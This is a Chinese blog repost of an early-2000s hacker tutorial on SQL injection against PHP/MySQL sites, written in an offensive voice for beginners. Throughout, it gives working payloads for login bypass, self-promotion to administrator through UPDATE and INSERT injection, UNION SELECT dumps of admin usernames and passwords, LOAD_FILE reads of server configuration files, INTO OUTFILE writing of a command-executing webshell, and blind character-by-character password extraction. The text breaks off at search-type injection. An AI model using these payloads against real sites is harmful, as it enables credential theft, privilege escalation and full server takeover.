CSDN博客

img cnssy

php注入!

发表于2004/12/31 10:41:00  707人阅读

分类: 技术文章

Php注入攻击是现今最流行的攻击方式,依靠它强大的灵活性吸引了广大黑迷。

在上一期的《php安全与注射专题》中林.linx主要讲述了php程序的各种漏洞,也讲到了php+mysql注入的问题,可是讲的注入的问题比较少,让我们感觉没有尽兴是吧.
OK,这一期我将给大家伙仔仔细细的吹一吹php+mysql注入,一定让你满载而归哦(谁扔砖头哩!)。
本文主要是为小菜们服务的,如果你已经是一只老鸟呢,可能某些东西会感觉比较乏味,但只要你仔细的看,你会发现很多有趣的东西哦。

阅读此文你只要明白下面的这点东西就够了。

1.明白php+mysql环境是如何搭建的,在光盘中我们收录搭建的相关文章,如果您对搭建php+mysql环境不是很清楚,请先查阅此文,在上一期的专题中也有所介绍。
2.大概了解php和apache的配置,主要用到php.ini和httpd.conf
而此文我们主要用到的是php.ini的配置。为了安全起见我们一般都打开php.ini里的安全模式,即让safe_mode = On,还有一个就是返回php执行错误的display_errors 这会返回很多有用的信息,所以我们应该关闭之,
即让display_errors=off  关闭错误显示后,php函数执行错误的信息将不会再显示给用户。
在php的配置文件php.ini中还有一个非常重要的配置选项magic_quotes_gpc,高版本的默认都是magic_quotes_gpc=On,只有在原来的古董级的php中的
默认配置是magic_quotes_gpc=Off,可是古董的东西也有人用的哦!
当php.ini中magic_quotes_gpc=On的时候会有什么情况发生哩,不用惊慌,天是塌不下来的啦!它只是把提交的变量中所有的 ' (单引号), " (双引号), / (反斜线) 和 空字符会自动转为含有反斜线的转义字符,例如把'变成了/',把/变成了//。
就是这一点,让我们很不爽哦,很多时候我们对字符型的就只好说BYEBYE了,
但是不用气馁,我们还是会有好方法来对付它的,往下看咯!
3.有一定的php语言基础和了解一些sql语句,这些都很简单,我们用到的东西很少,所以充电还来的及哦!

我们先来看看magic_quotes_gpc=Off的时候我们能干些啥,然后我们再想办法搞一搞magic_quotes_gpc=On的情况哈

一:magic_quotes_gpc=Off时的注入攻击
magic_quotes_gpc=Off的情况虽然说很不安全,新版本默认也让
magic_quotes_gpc=On了,可是在很多服务器中我们还发现magic_quotes_gpc=Off的情况,例如www.qichi.*。
还有某些程序像vbb论坛就算你配置magic_quotes_gpc=On,它也会自动消除转义字符让我们有机可乘,所以说
magic_quotes_gpc=Off的注入方式还是大有市场的。

下面我们将从语法,注入点 and 注入类型几个方面来详细讲解mysql+php注入

A:从MYSQL语法方面先
  1。先讲一些mysql的基本语法,算是给没有好好学习的孩子补课了哦~_~
      1)select
    SELECT [STRAIGHT_JOIN] [SQL_SMALL_RESULT]
    select_expression,...
    [INTO {OUTFILE | DUMPFILE} 'file_name' export_options]
    [FROM table_references
        [WHERE where_definition]
        [GROUP BY col_name,...]
[ORDER BY {unsigned_integer | col_name | formula} [ASC | DESC] ,...]
      ]
常用的就是这些,select_expression指想要检索的列,后面我们可以用where来限制条件,我们也可以用into outfile将select结果输出到文件中。当然我们也可以用select直接输出
例如

mysql> select 'a';
+---+
| a |
+---+
| a |
+---+
1 row in set (0.00 sec)
具体内容请看mysql中文手册7.12节
下面说一些利用啦
代码
这段代码是用来搜索的哦
.........
SELECT * FROM users WHERE username LIKE ‘%$search%' ORDER BY username
.......
?>

这里我们顺便说一下mysql中的通配符,'%'就是通配符,其它的通配符还有'*'和'_',其中" * "用来匹配字段名,而" % "用来匹配字段值,注意的是%必须与like一起适用,还有一个通配符,就是下划线" _ ",它代表的意思和上面不同,是用来匹配任何单个的字符的。在上面的代码中我们用到了'*'表示返回的所有字段名,%$search%表示所有包含$search字符的内容。

我们如何注入哩?
哈哈,和asp里很相似
在表单里提交
Aabb%' or 1=1 order by id#
注:#在mysql中表示注释的意思,即让后面的sql语句不执行,后面将讲到。
或许有人会问为什么要用or 1=1呢,看下面,

把提交的内容带入到sql语句中成为

SELECT * FROM users WHERE username LIKE ‘%aabb%' or 1=1 order by id# ORDER BY username

假如没有含有aabb的用户名,那么or 1=1使返回值仍为真,使能返回所有值

我们还可以这样

在表单里提交
%' order by id#
或者
' order by id#
带入sql语句中成了
SELECT * FROM users WHERE username LIKE ‘% %' order by id# ORDER BY username

SELECT * FROM users WHERE username LIKE ‘%%' order by id# ORDER BY username
当然了,内容全部返回。
列出所有用户了哟,没准连密码都出来哩。
这里就举个例子先,下面会有更精妙的select语句出现,select实际上几乎是无处不在的哦!
2)下面看update咯
Mysql中文手册里这么解释的:
UPDATE [LOW_PRIORITY] tbl_name SET col_name1=expr1,col_name2=expr2,...
        [WHERE where_definition]
UPDATE用新值更新现存表中行的列,SET子句指出哪个列要修改和他们应该被给定的值,WHERE子句,如果给出,指定哪个行应该被更新,否则所有行被更新。
详细内容去看mysql中文手册7.17节啦,在这里详细介绍的话会很罗嗦的哦。
由上可知update主要用于数据的更新,例如文章的修改,用户资料的修改,我们似乎更关心后者,因为......
代码先哦
我们先给出表的结构,这样大家看的明白
CREATE TABLE users (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)
其中userlevel表示等级,1为管理员,2为普通用户
//change.php
......
$sql = "UPDATE users SET password='$pass', email='$email' WHERE id='$id'"
......
?>
Ok,我们开始注入了哦,在添email的地方我们添入
netsh@163.com',userlevel='1
sql语句执行的就是
UPDATE users SET password='youpass',
email='netsh@163.com',userlevel='1' WHERE id='youid'
看看我们的userlevel就是1了,变成管理员了哟
哈哈,如此之爽,简直是居家旅行必备啊。
这里我们简单提一下单引号闭合的问题,如果只用了一个单引号而没有单引号与之组成一对,系统会返回错误。列类型主要分为数字类型,日期和时间类型,字符串类型,然而引号一般用在字符串类型里,而在数字类型里一般人都不会用到引号(然而却是可以用的,而且威力很大),日期和时间类型就很少用于注入了(因为很少有提交时间变量的)。在下面我们会详细将这几种类型的注入方式哦!

3)下面轮到insert了,它已经等的不耐烦了,简直就像中午食堂里的学生们。
Php中文手册是这样教我们的:
INSERT [LOW_PRIORITY | DELAYED] [IGNORE]
        [INTO] tbl_name [(col_name,...)]
        VALUES (expression,...),(...),...
INSERT把新行插入到一个存在的表中,INSERT ... VALUES形式的语句基于明确指定的值插入行,INSERT ... SELECT形式插入从其他表选择的行,有多个值表的INSERT ... VALUES的形式在MySQL 3.22.5或以后版本中支持,col_name=expression语法在MySQL 3.22.10或以后版本中支持。
由此可见对于见不到后台的我们来说,insert主要就出现在注册的地方,或者有其它提交的地方地方也可以哦。
看看表的结构先
CREATE TABLE membres (
id varchar(15) NOT NULL default '',
login varchar(25),
password varchar(25),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)
我们仍然假设userlevel表示用户等级,1为管理者,2为普通用户哈。
代码如下
//reg.php
......
$query = "INSERT INTO members VALUES('$id','$login','$pass','$email','2')" ;
......
?>
默认插入用户等级是2
现在我们构建注入语句了哦
还是在要我们输入email的地方输入:
netsh@163.com','1')#
sql语句执行时变成了:
INSERT INTO membres VALUES ('youid','youname','youpass',' netsh@163.com','1')#',?')
看我们一注册就是管理员了。
#号表示什么来着,不是忘了吧,晕了,这么快?
忘就忘了吧,下面再详细给你说说

2.下面说一说mysql中的注释,这个是很重要的,大家可不能再睡觉啦,要是再睡觉到期末考试的时候就挂了你们。
我们继续
相信大家在上面的几个例子中已经看到注释的强大作用了吧,这里我们将再详细介绍一下。
Mysql有3种注释句法
# 注射掉注释符后面的本行内容
-- 注射效果同#
/* ... */  注释掉符号中间的部分

对于#号将是我们最常用的注释方法。
-- 号记得后面还得有一个空格才能起注释作用。
/*...*/  我们一般只用前面的/*就够了,因为后面的我们想加也不行,是吧?

注意:在浏览器地址栏输入#时应把它写成%23,这样经urlencode转换后才能成为#,从而起到注释的作用。#号在浏览器的地址框中输入的话可什么也不是哦。
为了大家深刻理解
这里我给大家来个例题

有如下的管理员信息表

CREATE TABLE alphaauthor (
  Id tinyint(4) NOT NULL auto_increment,
  UserName varchar(50) NOT NULL default '',
  PASSWORD varchar(50) default NULL,
  Name varchar(50) default NULL,
  PRIMARY KEY  (Id),
  UNIQUE KEY Id (Id),
  KEY Id_2 (Id)
)

//Login.php
......
$query="select * from alphaauthor where UserName='$username' and Password='$passwd'";
$result=mysql_query($query);
$data=mysql_fetch_array($result);
if ($data)
    {
    Echo "重要信息";
    }
    Else
    Echo "登陆失败";
......
?>

我们在浏览器地址框直接输入
http://***/login.php?username=a'or id=1 %23
%23转换成#了
放到sql语句中
select * from alphaauthor where UserName='a'or id=1 #' and Password='$passwd'
#号后面的都拜输入了,看看
这句话等价于
select * from alphaauthor where UserName='a'or id=1

再仔细看看表的结构,只要有id=1的账户,返回的$data就应该为真
我们就直接登陆了,当然你也可以写
hppt://***/login.php?username=a'or 1=1 %23
一样的啦

3.下面将要出场的是......
对了,就是这些显示系统信息的间谍们

VERSION() 返回数据库版本信息
DATABASE() 返回当前的数据库名字,如果没有当前的数据库,DATABASE()返回空字符串。
USER()
SYSTEM_USER()
SESSION_USER()
返回当前MySQL用户名
mysql> select user(),database(),version();
+----------------+------------+----------------+
| user()         | database() | version()      |
+----------------+------------+----------------+
| root@localhost | alpha      | 5.0.0-alpha-nt |
+----------------+------------+----------------+
1 row in set (0.01 sec)
如图(1)所示,图不是很爽是不是?睁大你的大眼睛好好看哦

有时候很有用的哦,比如说你可以根据他的mysql版本看看他的mysql有没有什么溢出漏洞,没准我们就发现个好动东哈哈

4. 下面进入最重要的部分了,没睡觉的打起精神来,睡着了的醒一醒啦。
1)select union select
还是php中文手册中讲的:
SELECT ... UNION [ALL] SELECT ... [UNION SELECT ...]
UNION 在 MySQL 4.0.0 中被实现。
UNION 用于将多个 SELECT 语句的结果联合到一个结果集中。

在 SELECT 中的 select_expression 部分列出的列必须具有同样的类型。第一个 SELECT 查询中使用的列名将作为结果集的列名返回。
SELECT 命令是一个普通的选择命令,但是有下列的限制:
只有最后一个 SELECT 命令可以有 INTO OUTFILE。

需要注意的是union前后的select字段数相同,只有这样union函数才能发挥作用。如果字段数不等将返回
ERROR 1222 (21000): The used SELECT statements have a different number of columns 错误
晕咯,这样不好吧。咋半哩?
别急哈,急也没用的
例如:
已知alphadb表有11列
我们
mysql> select * from alphadb where id=351 union select 1,2,3,4,5,6,7,8,9,10 from alphaauthor;
如图(2)

我们只slect了10个数当然出错啦。
下面看
mysql> select * from alphadb where id=347 union select 1,2,3,4,5,6,7,8,9,10,11 from alphaauthor;
如图(3)

我们看看id=247中的数据先
mysql> select * from alphadb where id=347;
+-----+--------------------------------------------+-----------------
| id  | title | content | importtime | author | accessing | addInto | type | showup | change_ubb | change_html |
+-----+--------------------------------------------+-----------------
| 347 | 利用adsutil.vbs+..--发表于黑客档案2004.6期 | 发表于黑客x档案第6期 | 2004
-03-28 11:50:50 | Alpha  | 17 | Alpha  |    2 |   1 |    1 |  1 |
+-----+--------------------------------------------+-----------------
1 row in set (0.00 sec)
我们看到,它的返回结果和
mysql> select * from alphadb where id=347 union select 1,2,3,4,5,6,7,8,9,10,11 from alphaauthor;
是相同的。
哦,大家或许会问,这样有什么用呢?
问的好。
Ok,继续试验
当我们输入一个不存在的id的时候
例如id=0,或者id=347 and 1<>1
再看看
mysql> select * from alphadb where id=347 and 1<>1 union select 1,2,3,4,5,6,7,8,9,10,11 from alphaauthor;
如图(4)

我们发现它把我们后面的1,2,3,4,5,6,7,8,9,10,11赋给了各个字段来显示。
哈哈,终于显示不一样了,可是这有什么用呢?
先不告诉你。
我们讲一个具体的例子先
http://localhost/site/display.php?id=347
看看图5

http://localhost/site/display.php?id=347 and 1<>1 union select 1,2,3,4,5,6,7,8,9,10,11 from alphaauthor
结果如图6

下面我们用一幅图来总结一下union的用法如图7

Ok,知道怎么利用了不?不知道的话下面将会详细告诉你。
2)LOAD_FILE
这个功能太强大了,这也是林.linx在上一个专题中提到的方法。虽然说过了,可我也不得不再提出来。
Load_file可以返回文件的内容,记得写全文件的路径和文件名称
Etc.
我们在mysql的命令行下输入

mysql> select load_file('c:/boot.ini');
效果如图(8)

可是我们在网页中怎么搞呢?
我们可以结合union select使用
http://localhost/site/display.php?id=347%20and%201<>1%20union%20select%201,2,load_file('c:/apache/htdocs/site/lib/sql.inc'),4,5,6,7,8,9,10,11
这里的c:/apache/htdocs/site/lib/sql.inc并不是我的配置文件哦,:P
看仔细图9中的

看看,文件内容暴露无疑。
我们为什么要把load_file('c:/apache/htdocs/site/lib/sql.inc')放在3字段呢?我们前面提到列类型一共有那么三种,而原来图7中显示3的地方应该是显示文章内容,应该是字符型的,而load_file('c:/apache/htdocs/site/lib/sql.inc')也一定是字符型的,所以我们猜测放在3字段可以顺利显示。
其实还有很多好的利用方法,继续往下看哦!
3) select * from table into outfile'file.txt'
有啥用哩?
作用就是把表的内容写入文件,知道有多重要了吧,我们写个webshell吧,哈哈。
当然我们不只是导出表,我们还可以导出其它东西的哦,往下看啦。
假设有如下表

#
# 数据表的结构 `test`
#

CREATE TABLE test (
  a text,
  b text
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

#
# 导出下面的数据库内容 `test`
#

INSERT INTO test VALUES ('', NULL);

已知我的网站路径在C:/apache/htdocs/site/
好,看你表演哦,输入
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,a,4,5,6,7,8,9,10,11%20from%20test%20into%20outfile%20'C:/apache/htdocs/site/cmd.php'
意思就是把表里的a列内容导出到cmd.phpzhong
看看cmd.php里的内容先
1    2        0000-00-00 00:00:00    5    6    7    8    9    10    11
我们执行一下看看先
http://localhost/site/cmd.php?cmd=dir
如图(10)


哈哈,果然很爽哦!
4)下面给大家讲述LOAD DATA INFILE的故事

LOAD DATA [LOW_PRIORITY] [LOCAL] INFILE 'file_name.txt' [REPLACE | IGNORE] INTO TABLE tbl_name

LOAD DATA INFILE语句从一个文本文件中以很高的速度读入一个表中。
因为这个语句一般情况下不能在浏览器里直接输入,所以作用不是很大。

这里举个例子来说说
表test的结构和上面介绍的一样

#
# 数据表的结构 `test`
#

CREATE TABLE test (
  a text,
  b text
) ENGINE=MyISAM DEFAULT CHARSET=latin1;


我们在mysql命令行下输入:
Mysql>load data infile 'c:/cmd.php' into table test

其中c:/cmd.php内容为

注意:上面的内容写在一行里哦。
通过上面的指令我们就把cmd.asp的内容输入到了test表中
所得结果如图(11)

实际上得到的就是上个例子test表中的内容!看看,再结合into outfile,是不是一个完美的组合呢。
基本的语法就将到这里了,可能还有很多重要的东西漏掉了哦,你可以去php中文手册里淘金,相信你一定会找到很多好东西的,自己挖掘吧。(随光盘我们付上一个php中文手册)

B:从注入方式上
主要有数字型,字符型和搜索类
1.    数字型
很常见了,我们上面举的就一直是字符型的例子,大家应该还都记得asp下如何破管理员密码,下面我们来看一下php下如何实现
我们在地址栏输入:
http://localhost/site/display.php?id=451%20and%201=(select%20min(id)%20from%20alphaauthor)
判断是否存在alphaauthor,如果有返回正常页面(一般情况啦,有的时候也返回其它什么的,这主要根据构造1=1 和1=2时的页面判断)

http://localhost/site/display.php?id=451%20and%201=(select%20min(id)%20from%20alphaauthor%20where%20length(username)=5)
判断是否username字段的长度为5

http://localhost/site/display.php?id=451%20and%201=(select%20min(id)%20from%20alphaauthor%20where%20length(username)=5%20and%20length(password)=32)
跟上面差不多啦,判断password字段的长度

下面进入猜密码的阶段,用ascii方法来一位一位猜测吧。Ascii等同于asp下的asc,哈哈,经常看黑客X档案的一定很清楚啦。
http://localhost/site/display.php?id=451%20and%201=(select%20min(id)%20from%20alphaauthor%20where%20ascii(mid(username,1,1))=97)
用户名第一位哦ascii97就是字符a啦

http://localhost/site/display.php?id=451%20and%201=(select%20min(id)%20from%20alphaauthor%20where%20ascii(mid(username,2,1))=108)
第二位啦,这里只放这一个图啦,如图(12)


下面省略X条。
反正我们最后是得出用户名和密码了。
我们会发现这里的注入方法几乎和asp下的注入是一样的,就是把asc变成ascii,把len变成length就可以了,最后我们就可以得到后台的管理员账号和密码
当然我们有更简单的方法,可以直接用union的方法直接得到

http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,username,password,4,5,6,7,8,9,10,11%20from%20alphaauthor
如图(13)

账号是alpha,密码是一长串的东东,哈哈,简单明了,看到没有,这里显示出了union select的强大威力了吧。

上面讲的是在不通的表里面猜测内容,如果在同一个表里面我们还可以像下面这样哩:
下面的一段代码根据用户id显示用户信息

//user.php
...........
$sql = "SELECT * FROM user WHERE id=$id";
............

if (!$result)
{
echo "wrong";
exit;
}
else
echo "用户信息";
?>

猜测方法和上面几乎是一样的,就是我们不用再用select了。
我们输入
http://localhost/user.php?id=1 and length(password)=7
显示用户信息说明我们猜的正确,呵呵,comeon

http://localhost/user.php?id=1 and ascii(mid(password,1,1))=97
第一位密码
http://localhost/user.php?id=1 and ascii(mid(password,2,1))=97
第二位哦,

通过这种方法最终我们也可以得出id=1的用户的账号密码

2.    下面我们来看看字符型的注入方式
在asp中字符型的注入方式很灵活,在php中字符型的注入就主要在
magic_quotes_gpc=Off的情况下进行了。(除非有另外一种情况,先不告诉你)

例如:
//display.php
......
$query="select * from alphadb where id='".$id."'";
..............
?>
这样id就变成字符型的了。
不知道大家发现没有,假如我们这样写程序的话,安全性会有所提高的哦
    呵呵,继续了
好我们检验是否有注入先
http://localhost/site/display.php?id=451' and 1=1 and ‘'='
http://localhost/site/display.php?id=451' and 1=2 and ‘'='
带入到sql语句里就是
select * from alphadb where id='451'and 1=1 and ‘'=''
select * from alphadb where id='451'and 1=2 and ‘'=''

如果你发现页面信息不同的话说明漏洞存在哦
或者
http://localhost/site/display.php?id=451' and 1=1 %23
http://localhost/site/display.php?id=451' and 1=2 %23
%23转化以后就是#,即注释的意思,上面说过了哦
这样的话就不用考虑那个引号的闭合问题了,实际很多时候我们推荐这种方法。
把它带入到sql语句里就成了
select * from alphadb where id='451'and 1=1 #'
正是我们想要的哦!
看看效果吧,
http://localhost/site/display.php?id=451' and 1=1 %23
图(14)

正常显示了呓!

http://localhost/site/display.php?id=451' and 1=2 %23
图(15)


显示不正常,哈哈,说明问题存在
我们继续哦:
http://localhost/site/display.php?id=451'%20and%201=2%20%20union%20select%201,username,password,4,5,6,7,8,9,10,11%20from%20alphaauthor%23
看图(16)

Ok,用户名和密码又出来了哦!
3.    大家一起来看看搜索型注入吧
搜索型的语句一般这样写
//search.php
......
$query="select * from alphadb where title like '%$title%';
..............
?>
不知道大家还是否记得asp里的注入呢?
不过不记得也没有关系的啦,我们看吧。

0 0

相关博文

我的热门文章

img
取 消
img即使是一小步
也想与你分享
打开
img